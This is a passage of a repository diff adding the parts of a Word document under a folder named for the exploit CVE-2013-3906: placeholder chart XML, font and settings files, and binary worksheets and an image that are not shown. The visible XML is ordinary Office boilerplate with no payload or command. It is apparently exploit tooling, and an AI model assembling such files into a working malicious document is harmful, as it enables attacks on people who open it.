<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="71774208"/>
<c:axId val="71776128"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="71774208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71776128"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="71776128"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71774208"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

230
data/exploits/CVE-2013-3906/word/charts/chart3.xml Executable file
View File

@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="50252800"/>
<c:axId val="50255744"/>
<c:axId val="71870208"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="50252800"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50255744"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="50255744"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50252800"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="71870208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50255744"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

110
data/exploits/CVE-2013-3906/word/charts/chart4.xml Executable file
View File

@ -0,0 +1,110 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:title>
<c:layout/>
</c:title>
<c:view3D>
<c:rotX val="30"/>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="bar"/>
<c:grouping val="clustered"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Sales</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Sq.. 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Sq.. 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Sq.. 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Sq.. 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>8.1999999999999993</c:v>
</c:pt>
<c:pt idx="1">
<c:v>3.2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.4</c:v>
</c:pt>
<c:pt idx="3">
<c:v>1.2</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="box"/>
<c:axId val="50777472"/>
<c:axId val="50780032"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:valAx>
<c:axId val="50780032"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50777472"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:catAx>
<c:axId val="50777472"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50780032"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

228
data/exploits/CVE-2013-3906/word/charts/chart5.xml Executable file
View File

@ -0,0 +1,228 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:line3DChart>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:axId val="50940928"/>
<c:axId val="68729472"/>
<c:axId val="78014208"/>
</c:line3DChart>
<c:catAx>
<c:axId val="50940928"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68729472"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="68729472"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50940928"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="78014208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68729472"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

238
data/exploits/CVE-2013-3906/word/charts/chart6.xml Executable file
View File

@ -0,0 +1,238 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:surface3DChart>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:bandFmts/>
<c:axId val="59304576"/>
<c:axId val="68746240"/>
<c:axId val="59572224"/>
</c:surface3DChart>
<c:catAx>
<c:axId val="59304576"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68746240"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="68746240"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="59304576"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="midCat"/>
</c:valAx>
<c:serAx>
<c:axId val="59572224"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68746240"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
<c:txPr>
<a:bodyPr/>
<a:lstStyle/>
<a:p>
<a:pPr rtl="0">
<a:defRPr/>
</a:pPr>
<a:endParaRPr lang="en-US"/>
</a:p>
</c:txPr>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx Executable file
View File

Binary file not shown.

31
data/exploits/CVE-2013-3906/word/fontTable.xml Executable file
View File

@ -0,0 +1,31 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:font w:name="Calibri">
<w:panose1 w:val="020F0502020204030204"/>
<w:charset w:val="CC"/>
<w:family w:val="swiss"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
</w:font>
<w:font w:name="Times New Roman">
<w:panose1 w:val="02020603050405020304"/>
<w:charset w:val="CC"/>
<w:family w:val="roman"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
</w:font>
<w:font w:name="Tahoma">
<w:panose1 w:val="020B0604030504040204"/>
<w:charset w:val="CC"/>
<w:family w:val="swiss"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
</w:font>
<w:font w:name="Cambria">
<w:panose1 w:val="02040503050406030204"/>
<w:charset w:val="CC"/>
<w:family w:val="roman"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
</w:font>
</w:fonts>

BIN
data/exploits/CVE-2013-3906/word/media/image1.jpeg Executable file
View File

Binary file not shown.

36
data/exploits/CVE-2013-3906/word/settings.xml Executable file
View File

@ -0,0 +1,36 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
<w:zoom w:percent="100"/>
<w:proofState w:spelling="clean" w:grammar="clean"/>
<w:defaultTabStop w:val="708"/>
<w:characterSpacingControl w:val="doNotCompress"/>
<w:compat/>
<w:rsids>
<w:rsidRoot w:val="00D15BD0"/>
<w:rsid w:val="00D15BD0"/>
<w:rsid w:val="00F8254F"/>
</w:rsids>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr>
<w:themeFontLang w:val="en-US"/>
<w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
<w:shapeDefaults>
<o:shapedefaults v:ext="edit" spidmax="1026"/>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout>
</w:shapeDefaults>
<w:decimalSymbol w:val=","/>
<w:listSeparator w:val=";"/>
</w:settings>

220
data/exploits/CVE-2013-3906/word/styles.xml Executable file
View File

@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:docDefaults>
<w:rPrDefault>
<w:rPr>
<w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
<w:sz w:val="22"/>
<w:szCs w:val="22"/>
<w:lang w:val="en-US" w:bidi="ar-SA"/>
</w:rPr>
</w:rPrDefault>
<w:pPrDefault>
<w:pPr>
<w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
</w:pPr>
</w:pPrDefault>
</w:docDefaults>
<w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
<w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="toc 1" w:uiPriority="39"/>
<w:lsdException w:name="toc 2" w:uiPriority="39"/>
<w:lsdException w:name="toc 3" w:uiPriority="39"/>
<w:lsdException w:name="toc 4" w:uiPriority="39"/>
<w:lsdException w:name="toc 5" w:uiPriority="39"/>
<w:lsdException w:name="toc 6" w:uiPriority="39"/>
<w:lsdException w:name="toc 7" w:uiPriority="39"/>
<w:lsdException w:name="toc 8" w:uiPriority="39"/>
<w:lsdException w:name="toc 9" w:uiPriority="39"/>
<w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
<w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
<w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
<w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
